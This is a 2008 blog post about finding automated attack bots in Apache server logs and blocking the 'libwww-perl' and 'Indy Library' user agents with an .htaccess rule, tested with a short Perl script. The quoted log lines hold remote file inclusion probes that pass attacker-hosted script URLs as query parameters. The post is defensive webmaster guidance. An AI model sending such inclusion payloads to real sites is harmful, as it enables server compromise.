Home Accessibility Courses Twitter The Mouth Facebook Resources Site Map About Us Contact
 
For 2021 - online Python 3 training - see ((here)).

Our plans were to retire in summer 2020 and see the world, but Coronavirus has lead us into a lot of lockdown programming in Python 3 and PHP 7.
We can now offer tailored online training - small groups, real tutors - works really well for groups of 4 to 14 delegates. Anywhere in the world; course language English.

Please ask about private 'maintenance' training for Python 2, Tcl, Perl, PHP, Lua, etc.
libwww-perl and Indy Library in your server logs?

Here are some sample lines from our server logs ... and I don't like the look of them!

from 195.39.5.203 - Moravskoslezsky Kraj, Czech Republic [1000 miles] - libwww-perl/5.805
.net: /resources/recents.html/plugins/safeh...ms_files/images/id.txt???//index ... 16:44:24


from 91.187.115.253 - Vojvodina, Serbia [1295 miles] - Mozilla/3.0 (compatible; Indy Library)
.net: /resources/smap.php?adder=http://www.freewebs.com/atdheu-mc/raw.txt?/exa ... 16:45:17


Records like these - with "Indy Library" or "libwww-perl" in the name of the browser (which is also know as the "User Agent") - are very likely to be attempting to find a security hole in our site scripts, through which they can copy themselves onto our server and then continue to infect other systems, or to use our site to advertise their own by injecting their own URLs. So what are "Indy Library" and "libwww-perl"?

Indy Library usually comes from the Delphi/C++ Builder suite of tools. Someone has written an automated program using the library ...

libwww is from the Perl LWP (Library for WorldWideWeb in Perl) library, so in this case, it's probable that someone has written an automated program In Perl ...

Automated programs are a necessity - and indeed we welcome well behaved crawlers from the well known Google and Yahoo through to more obscure ones too, but authors of such crawlers who know properly what they're doing change the User Agent string rather than using the default - in my experience, we really don't want the default crawlers on our site, which are at least 90% malicious, with the remaining 10% being amateur. So how can we turn them off?

Standard practise is to deny specific user agents via the robots.txt file - but chances are that the naughty bots won't respect that so we need to enforce the rule!

Here are three lines that I've added to our .htaccess file ...

SetEnvIfNoCase User-Agent "libwww-perl" naughty_boys
SetEnvIfNoCase User-Agent "Indy Library" naughty_boys
Deny from env=naughty_boys


Which will send out a 403 Forbidden message to the automata, telling them that they can't have the page they seek. Goodness knows what the receiveing bot will do with the error - but we can make our 403 'handler' simple, quick, secure, and light on bandwidth.

How do we test that?

Here's a simple Perl script that will declare itself as being libwww:

#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$req = HTTP::Request->new(GET => 'http://www.wellho.net/index.html');
$res = $ua->request($req);
if ($res->is_success) {
  print $res->content;
} else {
  print "Error: " . $res->status_line . "\n";
}


And when I run that, it now gives me:

-bash-3.2$ perl pg1
Error: 403 Forbidden
-bash-3.2$


If I add the line:

$ua->agent("Well House Consultants Bot");

into that program, I get a much more satisfying result back ...

-bash-3.2$ perl pg2
 
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="Lisa Ellis" />
And so on


Links - full source code of our test program without and with our own user agent being set.


One of the matters that I considered very carefully indeed before blocking these use agents was the possibility that I'm blocking some useful and important traffic as well as a lot of "nasties" - throwing out the baby with the bathwater if you like. Not the case, I believe - as most people who have legit babies take good care of them and name them properly, but I will be watching my log files none the less to check.

As I finished writing this article - some poetic justice from my log file ...
64.159.77.76 - - [12/Sep/2008:21:28:20 +0100] "GET /mouth/1542_Are-nasty- programs-looking-for-security-holes-on-your- server-.html/errors.php?error= http://vnc2008.webcindario.com/idr0x.txt??? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
Some automaton is looking to hack into a previous short article on security holes and firmly being denied access.

(written 2008-09-13)

 
Associated topics are indexed as below, or enter http://melksh.am/nnnn for individual articles
A606 - Web Application Deployment - Apache httpd - log files and log tools
  [376] What brings people to my web site? - (2005-07-13)
  [1237] What proportion of our web traffic is robots? - (2007-06-19)
  [1503] Web page (http) error status 405 - (2008-01-12)
  [1598] Every link has two ends - fixing 404s at the recipient - (2008-04-02)
  [1656] Be careful of misreading server statistics - (2008-05-28)
  [1761] Logging Cookies with the Apache httpd web server - (2008-08-20)
  [1780] Server overloading - turns out to be feof in PHP - (2008-09-01)
  [3015] Logging the performance of the Apache httpd web server - (2010-10-25)
  [3019] Apache httpd Server Status - monitoring your server - (2010-10-28)
  [3027] Server logs - drawing a graph of gathered data - (2010-11-03)
  [3087] Making the most of critical emails - reading behind the scene - (2010-12-16)
  [3443] Getting more log information from the Apache http web server - (2011-09-16)
  [3447] Needle in a haystack - finding the web server overload - (2011-09-18)
  [3491] Who is knocking at your web site door? Are you well set up to deal with allcomers? - (2011-10-21)
  [3554] Learning more about our web site - and learning how to learn about yours - (2011-12-17)
  [3670] Reading Google Analytics results, based on the relative populations of countries - (2012-03-24)
  [3974] TV show appearance - how does it effect your web site? - (2013-01-13)
  [3984] 20 minutes in to our 15 minutes of fame - (2013-01-20)
  [4307] Identifying and clearing denial of service attacks on your Apache server - (2014-09-27)
  [4404] Which (virtual) host was visited? Tuning Apache log files, and Python analysis - (2015-01-23)
  [4491] Web Server Admin - some of those things that happen, and solutions - (2015-05-10)


Back to
What have iTime, honeytrapagency and domain listing center got in common?
Previous and next
or
Horse's mouth home
Forward to
I have been working hard but I do not expect you noticed
Some other Articles
Spiders Web
Regular Expressions in PHP
What does an browser understand? What does an HTML document contain?
I have been working hard but I do not expect you noticed
libwww-perl and Indy Library in your server logs?
What have iTime, honeytrapagency and domain listing center got in common?
Refactoring - a PHP demo becomes a production page
Which country does a search engine think you are located in?
All the pieces fall into place - hotel and courses
The road ahead - Python 3
4759 posts, page by page
Link to page ... 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96 at 50 posts per page


This is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.

Link to Ezine home page (for reading).
Link to Blogging home page (to add comments).

You can Add a comment or ranking to this page

© WELL HOUSE CONSULTANTS LTD., 2021: 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 01144 1225 708225 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho

PAGE: http://www.wellho.net/mouth/1796_lib ... logs-.html • PAGE BUILT: Sun Oct 11 16:07:41 2020 • BUILD SYSTEM: JelliaJamb